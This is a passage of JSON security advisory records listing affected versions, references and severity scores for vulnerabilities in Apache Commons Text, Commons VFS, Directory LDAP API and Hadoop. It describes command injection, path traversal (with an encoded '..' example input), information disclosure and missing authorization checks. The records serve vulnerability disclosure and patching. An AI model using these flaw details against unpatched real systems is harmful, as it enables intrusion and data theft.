"1.0.19.3-jre14", "1.0.19.3-jre15", "1.0.19.3-jre8", "1.0.19.4", "1.0.19.4-jre14", "1.0.19.4-jre15", "1.0.19.4-jre8", "1.0.19.5", "1.0.19.5-jre14", "1.0.19.5-jre15", "1.0.19.5-jre8", "1.0.19.6", 
"1.0.19.6-jre14", "1.0.19.6-jre8", "1.0.19.7-jre14", "1.0.19.7-jre8", "1.0.19.8-jre8", "1.0.19.9", "1.0.19.9-jre13", "1.0.19.9-jre14", "1.0.19.9-jre15", "1.0.19.9-jre8", "1.0.2.0", "1.0.2.0-jre12", "1.0.2.0-jre13", "1.0.2.0-jre8", "1.0.2.1", "1.0.2.1-jre12", "1.0.2.1-jre13", "1.0.2.10", "1.0.2.10-jre12", "1.0.2.10-jre13", "1.0.2.11", "1.0.2.11-jre13", "1.0.2.12", "1.0.2.12-jre13", "1.0.2.13", "1.0.2.13-jre13", "1.0.2.14", "1.0.2.14-jre13", "1.0.2.15", "1.0.2.15-jre13", "1.0.2.16-jre13", "1.0.2.17-jre13", "1.0.2.18", "1.0.2.18-jre12", "1.0.2.18-jre13", "1.0.2.2", "1.0.2.2-jre12", "1.0.2.2-jre13", "1.0.2.2-jre8", "1.0.2.3", "1.0.2.3-jre12", "1.0.2.3-jre13", "1.0.2.3-jre8", "1.0.2.4", "1.0.2.4-jre12", "1.0.2.4-jre13", "1.0.2.6-jre13", "1.0.2.7-jre12", "1.0.2.7-jre13", "1.0.2.8", "1.0.2.8-jre12", "1.0.2.8-jre13", "1.0.2.9-jre12", "1.0.2.9-jre13", "1.0.20.0", "1.0.20.0-jre14", "1.0.20.0-jre15", "1.0.20.0-jre8", "1.0.20.1", "1.0.20.1-jre14", "1.0.20.1-jre15", "1.0.20.1-jre8", "1.0.20.2", "1.0.20.2-jre14", "1.0.20.2-jre15", "1.0.20.2-jre8", "1.0.3.1-jre13", "1.0.3.2", "1.0.3.2-jre13", "1.0.3.3", "1.0.3.3-jre12", "1.0.3.3-jre13", "1.0.4.1-jre13", "1.0.4.2", "1.0.4.2-jre13", "1.0.4.3-jre13", "1.0.4.4", "1.0.4.4-jre13", "1.0.5.0", "1.0.5.0-jre13", "1.0.5.1", "1.0.5.1-jre12", "1.0.5.1-jre13", "1.0.5.2", "1.0.5.2-jre12", "1.0.5.2-jre13", "1.0.5.3", "1.0.5.3-jre12", "1.0.5.3-jre13", "1.0.5.4-jre13", "1.0.5.4-jre14", "1.0.5.5", "1.0.5.5-jre12", "1.0.5.5-jre13", "1.0.5.5-jre14", "1.0.6.1", "1.0.6.1-jre12", "1.0.6.1-jre13", "1.0.6.1-jre14", "1.0.6.2", "1.0.6.2-jre12", "1.0.6.2-jre13", "1.0.6.2-jre14", "1.0.6.3", "1.0.6.3-jre12", "1.0.6.3-jre13", "1.0.6.3-jre14", "1.0.6.4-jre14", "1.0.6.5", "1.0.6.5-jre12", "1.0.6.5-jre13", "1.0.6.5-jre14", "1.0.6.7", "1.0.6.7-jre14", "1.0.7.0", "1.0.7.0-jre12", "1.0.7.0-jre13", "1.0.7.0-jre14", "1.0.7.1", "1.0.7.1-jre13", "1.0.7.1-jre14", "1.0.7.10", "1.0.7.10-jre13", "1.0.7.10-jre14", "1.0.7.11", "1.0.7.11-jre14", "1.0.7.12", "1.0.7.12-jre12", 
"1.0.7.12-jre13", "1.0.7.12-jre14", "1.0.7.2-jre14", "1.0.7.3", "1.0.7.3-jre13", "1.0.7.3-jre14", "1.0.7.4", "1.0.7.4-jre14", "1.0.7.5", "1.0.7.5-jre14", "1.0.7.6", "1.0.7.6-jre14", "1.0.7.9", "1.0.7.9-jre14", "1.0.8.1", "1.0.8.1-jre14", "1.0.8.12", "1.0.8.12-jre12", "1.0.8.12-jre14", "1.0.8.16", "1.0.8.16-jre14", "1.0.8.18", "1.0.8.18-jre14", "1.0.8.2", "1.0.8.2-jre13", "1.0.8.2-jre14", "1.0.8.3", "1.0.8.3-jre13", "1.0.8.3-jre14", "1.0.8.4", "1.0.8.4-jre12", "1.0.8.4-jre13", "1.0.8.4-jre14", "1.0.8.5", "1.0.8.5-jre12", "1.0.8.5-jre13", "1.0.8.5-jre14", "1.0.8.6-jre14", "1.0.9.0", "1.0.9.0-jre14", "1.0.9.1", "1.0.9.1-jre14", "1.0.9.10", "1.0.9.10-jre14", "1.0.9.11", "1.0.9.11-jre14", "1.0.9.13", "1.0.9.13-jre14", "1.0.9.14", "1.0.9.14-jre14", "1.0.9.2", "1.0.9.2-jre14", "1.0.9.3-jre14", "1.0.9.4-jre14", "1.0.9.5-jre14", "1.0.9.7-jre14", "1.1.0.0-jre15", "1.1.0.1", "1.1.0.1-jre14", "1.1.0.1-jre15", "1.1.0.2", "1.1.0.2-jre14", "1.1.0.2-jre15", "1.1.0.3", "1.1.0.3-jre14", "1.1.0.3-jre15", "1.1.0.3-jre8", "1.1.0.4-jre14", "1.1.0.4-jre15", "1.1.0.4-jre8", "1.1.0.5-jre14", "1.1.0.5-jre15", "1.1.0.6", "1.1.0.6-jre14", "1.1.0.6-jre15", "1.1.0.7", "1.1.0.7-jre14", "1.1.0.7-jre15", "1.1.0.7-jre8", "1.1.0.8-SNAPSHOT-jre14", "1.1.1.0", "1.1.1.0-SNAPSHOT-jre14", "1.1.1.0-SNAPSHOT-jre15", "1.1.1.0-SNAPSHOT-jre8", "1.1.1.0-jre14", "1.1.1.0-jre15", "1.1.1.0-jre8", "1.1.1.1-SP1", "1.1.1.1-jre14-SP1", "1.1.1.1-jre15-SP1", "1.1.1.2", "1.1.1.2-jre14", "1.1.1.2-jre15", "1.1.1.3", "1.1.1.3-jre14", "1.1.1.3-jre15", "1.1.1.3-jre16", "1.1.1.3-jre8", "1.1.1.4", "1.1.1.4-jre14", "1.1.1.4-jre15", "1.1.1.4-jre16", "1.1.1.4-jre8", "1.1.1.5-jre15", "1.1.1.7", "1.1.1.7-jre15", "1.1.1.7-jre16", "1.1.1.7-jre8", "1.1.1.8-jre15", "1.1.1.8-jre16", "1.1.1.9-jre15", "1.1.1.9-jre16", "1.2.0.0-jre16", "1.2.0.1-jre11", "1.2.0.1-jre15", "1.2.0.1-jre16", "1.2.0.2-jre16", "1.2.0.3-jre17-rc1", "1.2.1.1-jre17", "1.2.1.2-jre17", "1.2.2.1", "1.2.2.1-jre17" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/10/GHSA-599f-7c49-w659/GHSA-599f-7c49-w659.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-42889" }, { "type": "WEB", "url": "https://arxiv.org/pdf/2306.05534" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-text" }, { "type": "WEB", "url": "https://lists.apache.org/thread/n2bd4vdsgkqh2tm14l1wyc3jyol7s1om" }, { "type": "WEB", "url": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2022-0022" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202301-05" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20221020-0004" }, { "type": "ADVISORY", "url": "https://securitylab.github.com/advisories/GHSL-2022-018_Apache_Commons_Text" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/171003/OX-App-Suite-Cross-Site-Scripting-Server-Side-Request-Forgery.html" }, { "type": "WEB", "url": "http://packetstormsecurity.com/files/176650/Apache-Commons-Text-1.9-Remote-Code-Execution.html" }, { "type": "WEB", "url": "http://seclists.org/fulldisclosure/2023/Feb/3" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/10/13/4" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2022/10/18/1" } ], "database_specific": { "cwe_ids": [ "CWE-94" ], "github_reviewed": true, "github_reviewed_at": "2022-10-13T20:22:17Z", "nvd_published_at": "2022-10-13T13:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-3936-3gx6-49c4", "published": "2025-03-23T15:30:33Z", "modified": "2025-03-25T03:50:54.932958Z", "aliases": [ "CVE-2025-30474" ], "summary": "Apache Commons VFS Exposure of Sensitive Information to an Unauthorized Actor", "details": "Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache Commons 
VFS.\n\nThe FtpFileObject class can throw an exception when a file is not found, revealing the original URI in its message, which may include a password. The fix is to mask the password in the exception message\nThis issue affects Apache Commons VFS: before 2.10.0.\n\nUsers are recommended to upgrade to version 2.10.0, which fixes the issue.", "affected": [ { "package": { "name": "org.apache.commons:commons-vfs2", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-vfs2" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.10.0" } ] } ], "versions": [ "2.0", "2.1", "2.2", "2.3", "2.4", "2.4.1", "2.5.0", "2.6.0", "2.7.0", "2.8.0", "2.9.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-3936-3gx6-49c4/GHSA-3936-3gx6-49c4.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-30474" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-vfs" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/VFS-169" }, { "type": "WEB", "url": "https://lists.apache.org/thread/w6ztgnbk6ccry3470x191g3xwrpgy6f4" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/03/23/2" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2025-03-25T03:23:11Z", "nvd_published_at": "2025-03-23T15:15:14Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9q4x-fr4m-jp86", "published": "2025-03-23T15:30:33Z", "modified": "2025-04-03T01:24:03.415749Z", "aliases": [ "CVE-2025-27553" ], "summary": "Apache Commons VFS Has Relative Path Traversal Vulnerability", "details": "Relative Path Traversal vulnerability in Apache Commons VFS before 2.10.0.\n\nThe FileObject API in Commons VFS has a 'resolveFile' 
method that\ntakes a 'scope' parameter. Specifying 'NameScope.DESCENDENT' promises that \"an exception is thrown if the resolved file is not a descendent of\nthe base file\". However, when the path contains encoded \"..\"\ncharacters (for example, \"%2E%2E/bar.txt\"), it might return file objects that are not\na descendent of the base file, without throwing an exception.\nThis issue affects Apache Commons VFS: before 2.10.0.\n\nUsers are recommended to upgrade to version 2.10.0, which fixes the issue.", "affected": [ { "package": { "name": "org.apache.commons:commons-vfs2", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.commons/commons-vfs2" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.10.0" } ] } ], "versions": [ "2.0", "2.1", "2.2", "2.3", "2.4", "2.4.1", "2.5.0", "2.6.0", "2.7.0", "2.8.0", "2.9.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/03/GHSA-9q4x-fr4m-jp86/GHSA-9q4x-fr4m-jp86.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-27553" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-vfs" }, { "type": "WEB", "url": "https://lists.apache.org/thread/cnzqowyw9r2pl263cylmxhnvh41hyjcb" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/04/msg00006.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/03/23/1" } ], "database_specific": { "cwe_ids": [ "CWE-23" ], "github_reviewed": true, "github_reviewed_at": "2025-03-25T03:21:09Z", "nvd_published_at": "2025-03-23T15:15:13Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-cx3q-cv6w-mx4h", "published": "2022-05-17T00:51:52Z", "modified": "2023-11-08T03:57:53.766909Z", "aliases": [ "CVE-2015-3250" ], "summary": "Exposure of Sensitive Information to an 
Unauthorized Actor in Apache Directory LDAP API", "details": "Apache Directory LDAP API before 1.0.0-M31 allows attackers to conduct timing attacks via unspecified vectors.", "affected": [ { "package": { "name": "org.apache.directory.api:api-ldap-model", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.directory.api/api-ldap-model" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.0.0-M31" } ] } ], "versions": [ "1.0.0-M14", "1.0.0-M15", "1.0.0-M16", "1.0.0-M17", "1.0.0-M18", "1.0.0-M19", "1.0.0-M20", "1.0.0-M21", "1.0.0-M22", "1.0.0-M23", "1.0.0-M24", "1.0.0-M25", "1.0.0-M26", "1.0.0-M27", "1.0.0-M28", "1.0.0-M29", "1.0.0-M30" ], "database_specific": { "last_known_affected_version_range": "\u003c= 1.0.0-M30", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-cx3q-cv6w-mx4h/GHSA-cx3q-cv6w-mx4h.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-3250" }, { "type": "WEB", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1241163" }, { "type": "WEB", "url": "http://directory.apache.org/api/#news_1" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2015/07/07/11" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2015/07/07/5" } ], "database_specific": { "cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2022-07-06T20:17:29Z", "nvd_published_at": "2017-09-07T13:29:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-7q56-mp4c-gggg", "published": "2022-05-17T03:35:31Z", "modified": "2023-11-08T03:58:31.207186Z", "aliases": [ "CVE-2016-5393" ], "summary": "Improper Access Control in Apache Hadoop", "details": "In Apache Hadoop 2.6.x before 2.6.5 and 2.7.x before 2.7.3, a remote user who can authenticate with the HDFS NameNode can possibly run arbitrary 
commands with the same privileges as the HDFS service.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.6.0" }, { "fixed": "2.6.5" } ] } ], "versions": [ "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.6.4", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-7q56-mp4c-gggg/GHSA-7q56-mp4c-gggg.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.3" } ] } ], "versions": [ "2.7.0", "2.7.1", "2.7.2" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.2", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-7q56-mp4c-gggg/GHSA-7q56-mp4c-gggg.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-5393" }, { "type": "WEB", "url": "http://mail-archives.apache.org/mod_mbox/hadoop-general/201611.mbox/%3CCAA0W1bTbUmUUSF1rjRpX-2DvWutcrPt7TJSWUcSLg1F0gyHG1Q%40mail.gmail.com%3E" }, { "type": "WEB", "url": "http://www.securityfocus.com/bid/94574" } ], "database_specific": { "cwe_ids": [ "CWE-284" ], "github_reviewed": true, "github_reviewed_at": "2022-07-06T19:44:12Z", "nvd_published_at": "2016-11-29T06:59:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-8r28-r8cp-g6cp", "published": "2022-05-13T01:08:56Z", "modified": "2023-11-08T03:58:30.347713Z", "aliases": [ "CVE-2016-5001" ], "summary": "Exposure of Sensitive Information to an Unauthorized Actor in Apache Hadoop", 
"details": "This is an information disclosure vulnerability in Apache Hadoop before 2.6.4 and 2.7.x before 2.7.2 in the short-circuit reads feature of HDFS. A local user on an HDFS DataNode may be able to craft a block token that grants unauthorized read access to random files by guessing certain fields in the token.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "2.6.4" } ] } ], "versions": [ "0.22.0", "0.23.1", "0.23.10", "0.23.11", "0.23.3", "0.23.4", "0.23.5", "0.23.6", "0.23.7", "0.23.8", "0.23.9", "2.0.0-alpha", "2.0.1-alpha", "2.0.2-alpha", "2.0.3-alpha", "2.0.4-alpha", "2.0.5-alpha", "2.0.6-alpha", "2.1.0-beta", "2.1.1-beta", "2.2.0", "2.3.0", "2.4.0", "2.4.1", "2.5.0", "2.5.1", "2.5.2", "2.6.0", "2.6.1", "2.6.2", "2.6.3" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.6.3", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-8r28-r8cp-g6cp/GHSA-8r28-r8cp-g6cp.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.7.0" }, { "fixed": "2.7.2" } ] } ], "versions": [ "2.7.0", "2.7.1" ], "database_specific": { "last_known_affected_version_range": "\u003c= 2.7.1", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-8r28-r8cp-g6cp/GHSA-8r28-r8cp-g6cp.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-5001" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r66de86b9a608c1da70b2d27d765c11ec88edf6e5dd6f379ab33e072a@%3Cuser.flink.apache.org%3E" }, { "type": "WEB", "url": "http://seclists.org/oss-sec/2016/q4/698" } ], "database_specific": { 
"cwe_ids": [ "CWE-200" ], "github_reviewed": true, "github_reviewed_at": "2022-07-06T19:43:24Z", "nvd_published_at": "2017-08-30T19:29:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-8wm5-8h9c-47pc", "published": "2022-08-05T00:00:24Z", "modified": "2024-02-21T05:29:29.300541Z", "aliases": [ "CVE-2022-25168" ], "summary": "Apache Hadoop argument injection vulnerability", "details": "Apache Hadoop's `FileUtil.unTar(File, File)` API does not escape the input file name before being passed to the shell. An attacker can inject arbitrary commands. This is only used in Hadoop 3.3 InMemoryAliasMap.completeBootstrapTransfer, which is only ever run by a local user. It has been used in Hadoop 2.x for yarn localization, which does enable remote code execution. It is used in Apache Spark, from the SQL command ADD ARCHIVE. As the ADD ARCHIVE command adds new binaries to the classpath, being able to execute shell scripts does not confer new permissions to the caller. SPARK-38305. \"Check existence of file before untarring/zipping\", which is included in 3.3.0, 3.1.4, 3.2.2, prevents shell commands being executed, regardless of which version of the hadoop libraries are in use. 
Users should upgrade to Apache Hadoop 2.10.2, 3.2.4, 3.3.3 or upper (including HADOOP-18136).", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.10.2" } ] } ], "versions": [ "2.0.1-alpha", "2.0.2-alpha", "2.0.3-alpha", "2.0.4-alpha", "2.0.5-alpha", "2.0.6-alpha", "2.1.0-beta", "2.1.1-beta", "2.10.0", "2.10.1", "2.2.0", "2.3.0", "2.4.0", "2.4.1", "2.5.0", "2.5.1", "2.5.2", "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.7.0", "2.7.1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.8.0", "2.8.1", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.9.0", "2.9.1", "2.9.2" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/08/GHSA-8wm5-8h9c-47pc/GHSA-8wm5-8h9c-47pc.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.0.0-alpha" }, { "fixed": "3.2.4" } ] } ], "versions": [ "3.0.0", "3.0.0-alpha1", "3.0.0-alpha2", "3.0.0-alpha3", "3.0.0-alpha4", "3.0.0-beta1", "3.0.1", "3.0.2", "3.0.3", "3.1.0", "3.1.1", "3.1.2", "3.1.3", "3.1.4", "3.2.0", "3.2.1", "3.2.2", "3.2.3" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/08/GHSA-8wm5-8h9c-47pc/GHSA-8wm5-8h9c-47pc.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.3.0" }, { "fixed": "3.3.3" } ] } ], "versions": [ "3.3.0", "3.3.1", "3.3.2" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/08/GHSA-8wm5-8h9c-47pc/GHSA-8wm5-8h9c-47pc.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-25168" }, { "type": "WEB", "url": "https://github.com/apache/hadoop/commit/cae749b076f35f0be13a926ee8cfbb7ce4402746" }, { "type": "PACKAGE", "url": "https://github.com/apache/hadoop" }, { "type": "WEB", "url": "https://lists.apache.org/thread/mxqnb39jfrwgs3j6phwvlrfq4mlox130" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20220915-0007" } ], "database_specific": { "cwe_ids": [ "CWE-78", "CWE-88" ], "github_reviewed": true, "github_reviewed_at": "2022-08-11T21:14:19Z", "nvd_published_at": "2022-08-04T15:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-9r7g-325h-mxrm", "published": "2022-05-17T02:53:20Z", "modified": "2023-11-08T03:57:32.986597Z", "aliases": [ "CVE-2014-0229" ], "summary": "Improper Authentication in Apache Hadoop", "details": "Apache Hadoop 0.23.x before 0.23.11 and 2.x before 2.4.1, as used in Cloudera CDH 5.0.x before 5.0.2, do not check authorization for the (1) refreshNamenodes, (2) deleteBlockPool, and (3) shutdownDatanode HDFS admin commands, which allows remote authenticated users to cause a denial of service (DataNodes shutdown) or perform unnecessary operations by issuing a command.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0.23.0" }, { "fixed": "0.23.11" } ] } ], "versions": [ "0.23.1", "0.23.10", "0.23.3", "0.23.4", "0.23.5", "0.23.6", "0.23.7", "0.23.8", "0.23.9" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-9r7g-325h-mxrm/GHSA-9r7g-325h-mxrm.json" } }, { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "2.0.0" }, { "fixed": "2.4.1" } ] } ], "versions": [ "2.0.1-alpha", "2.0.2-alpha", "2.0.3-alpha", "2.0.4-alpha", "2.0.5-alpha", "2.0.6-alpha", "2.1.0-beta", "2.1.1-beta", "2.2.0", "2.3.0", "2.4.0" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2022/05/GHSA-9r7g-325h-mxrm/GHSA-9r7g-325h-mxrm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-0229" }, { "type": "WEB", "url": "https://www.cloudera.com/documentation/other/security-bulletins/topics/csb_topic_1.html#concept_i1q_xvk_2r" } ], "database_specific": { "cwe_ids": [ "CWE-287" ], "github_reviewed": true, "github_reviewed_at": "2022-07-07T22:54:01Z", "nvd_published_at": "2017-03-23T20:59:00Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-f5fw-25gw-5m92", "published": "2024-09-25T09:30:46Z", "modified": "2025-09-05T16:59:47.705794Z", "aliases": [ "CVE-2024-23454" ], "summary": "Apache Hadoop: Temporary File Local Information Disclosure", "details": "Apache Hadoop’s `RunJar.run()` does not set permissions for temporary directory by default. If sensitive data will be present in this file, all the other local users may be able to view the content. This is because, on unix-like systems, the system temporary directory is shared between all local users. 
As such, files written in this directory, without setting the correct posix permissions explicitly, may be viewable by all other local users.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "3.4.0" } ] } ], "versions": [ "0.22.0", "0.23.1", "0.23.10", "0.23.11", "0.23.3", "0.23.4", "0.23.5", "0.23.6", "0.23.7", "0.23.8", "0.23.9", "2.0.0-alpha", "2.0.1-alpha", "2.0.2-alpha", "2.0.3-alpha", "2.0.4-alpha", "2.0.5-alpha", "2.0.6-alpha", "2.1.0-beta", "2.1.1-beta", "2.10.0", "2.10.1", "2.10.2", "2.2.0", "2.3.0", "2.4.0", "2.4.1", "2.5.0", "2.5.1", "2.5.2", "2.6.0", "2.6.1", "2.6.2", "2.6.3", "2.6.4", "2.6.5", "2.7.0", "2.7.1", "2.7.2", "2.7.3", "2.7.4", "2.7.5", "2.7.6", "2.7.7", "2.8.0", "2.8.1", "2.8.2", "2.8.3", "2.8.4", "2.8.5", "2.9.0", "2.9.1", "2.9.2", "3.0.0", "3.0.0-alpha1", "3.0.0-alpha2", "3.0.0-alpha3", "3.0.0-alpha4", "3.0.0-beta1", "3.0.1", "3.0.2", "3.0.3", "3.1.0", "3.1.1", "3.1.2", "3.1.3", "3.1.4", "3.2.0", "3.2.1", "3.2.2", "3.2.3", "3.2.4", "3.3.0", "3.3.1", "3.3.2", "3.3.3", "3.3.4", "3.3.5", "3.3.6" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2024/09/GHSA-f5fw-25gw-5m92/GHSA-f5fw-25gw-5m92.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23454" }, { "type": "WEB", "url": "https://github.com/apache/hadoop/commit/8c2836402fbb2f619f1fef4ef625a8542e853a64" }, { "type": "PACKAGE", "url": "https://github.com/apache/hadoop" }, { "type": "WEB", "url": "https://issues.apache.org/jira/browse/HADOOP-19031" }, { "type": "WEB", "url": "https://lists.apache.org/thread/xlo7q8kn4tsjvx059r789oz19hzgfkfs" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20241101-0002" }, { "type": "WEB", "url": 
"http://www.openwall.com/lists/oss-security/2024/09/25/1" } ], "database_specific": { "cwe_ids": [ "CWE-269", "CWE-378" ], "github_reviewed": true, "github_reviewed_at": "2024-09-25T14:31:09Z", "nvd_published_at": "2024-09-25T08:15:04Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-f8vc-wfc8-hxqh", "published": "2022-02-09T22:17:38Z", "modified": "2024-03-08T05:20:12.847694Z", "aliases": [ "BIT-solr-2020-9492", "CVE-2020-9492" ], "summary": "Improper Privilege Management in Apache Hadoop", "details": "In Apache Hadoop 3.2.0 to 3.2.1, 3.0.0-alpha1 to 3.1.3, and 2.0.0-alpha to 2.10.0, WebHDFS client might send SPNEGO authorization header to remote URL without proper verification.", "affected": [ { "package": { "name": "org.apache.hadoop:hadoop-common", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.hadoop/hadoop-common" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "3.2.0" }, { 